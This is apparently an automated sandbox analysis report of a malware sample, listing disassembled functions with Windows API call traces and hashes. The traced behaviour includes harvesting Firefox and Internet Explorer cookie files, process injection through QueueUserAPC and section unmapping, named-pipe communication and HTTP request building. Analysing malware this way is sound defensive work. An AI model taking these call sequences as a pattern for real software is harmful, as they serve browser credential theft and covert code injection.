  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
